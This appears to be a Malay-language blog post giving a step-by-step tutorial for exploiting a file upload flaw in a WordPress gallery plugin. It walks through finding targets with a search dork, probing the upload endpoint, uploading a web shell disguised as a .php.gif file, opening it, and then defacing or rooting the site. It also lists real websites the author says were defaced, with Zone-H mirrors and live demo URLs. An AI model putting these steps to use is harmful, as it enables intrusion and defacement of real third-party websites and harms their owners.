0

 Assalamualaikum, selamat pagi. Hari nie adalah permulaan part ke-2 kita menjalani ibadah puasa yang sepertimana kita ketahui, Ramadhan terbahagi kepada 3 bahagian iaitu yang di awalnya rahmat,di tengahnya keampunan dan di akhirnya terlepas dari api neraka.



Okay, entry kali ini sy ingin kongsikan cara bagaimana hacker menggunakan exploit jenis ini yang anda boleh dapati di exploit-db. Tutorial ini sy hasilkan melalui proses pembelajaran yang berasaskan try and error. Ingin sy tegaskan bahawa entry ini adalah sebahagian proses pembelajaran sahaja.

Disini ada sy sertakan website  yang mengandungi Vulnerability tersebut telah sy notify pada Zone-H
(plugin website ini telah sy buang , jadi tak perlulah cuba lagi)

http://31daystoglowinghealth.com/readme.html
[ mirror ] http://zone-h.com/mirror/id/20307795

http://lukedillon.co.za/readme.html
 
[ mirror ] http://zone-h.com/mirror/id/20307796

http://margotherringer.com/readme.html 

[ mirror ] http://zone-h.com/mirror/id/20307797

http://www.pacificbridge.jp/apache.html

[ mirror ] http://zone-h.com/mirror/id/20304865

http://www.evidencedesign.net/readme.html

[ mirror ] http://zone-h.com/mirror/id/20307159

Langkah 1
Kita akan menggunakan browser Mozilla Firefox & Add-ons Http Requester 

Langkah 2 
Kenali dork yang berpatutan dengan Vulnerability ini. Dork yang sy gunakan adalah seperti ini 
inurl:/wp-content/plugins/gallery-plugin/ Buat carian pada ejen carian Google @ Bing @ ikut selera anda.

Langkah 3
Test samada link itu vlun atau tidak, Cara test
http://[domain]/[path]/wp-content/plugins/gallery-plugin/upload/php.php
Sekiranya ada keluar warning sebegini {error:'No files were uploaded.'} kebarangkalian vlun.
Demo: http://www.pacificbridge.jp/mainpage/wp-content/plugins/gallery-plugin/upload/php.php
Demo 2: http://www.mymatricdance.co.za/wp-content/plugins/gallery-plugin/upload/php.php 


Langkah 4
Buka Http Requester pada Tools > HttpRequester masukkan link itu dan tambahkan di hujung link itu command ini /?qqfile=nama_shell_anda.php.gif . Perhatikan  print screen ini



{success:true,width:,height:}
tahniah, shell anda berjaya di upload 
note: berjaya upload belum tentu ianya boleh execute jadi kita cuba sahaja

Langkah 5
Mari akses shell yang baru kuta upload sebentar tadi pada url ini
http://[domain]/[path]/wp-content/plugins/gallery-plugin/files/nama_shell_anda.php.gif


Langkah 6
Sekarang terpulang pada anda, mahu deface, root atau apasahaja.

note: Sy hanyalah belajar dari kaedah try and error, jadi sekiranya ada penyalahgunaan istilah atau tersalah procedure mohon ditegur because i'am just another noob trying to help other noob. wassalam.

Post a Comment Blogger

 
Top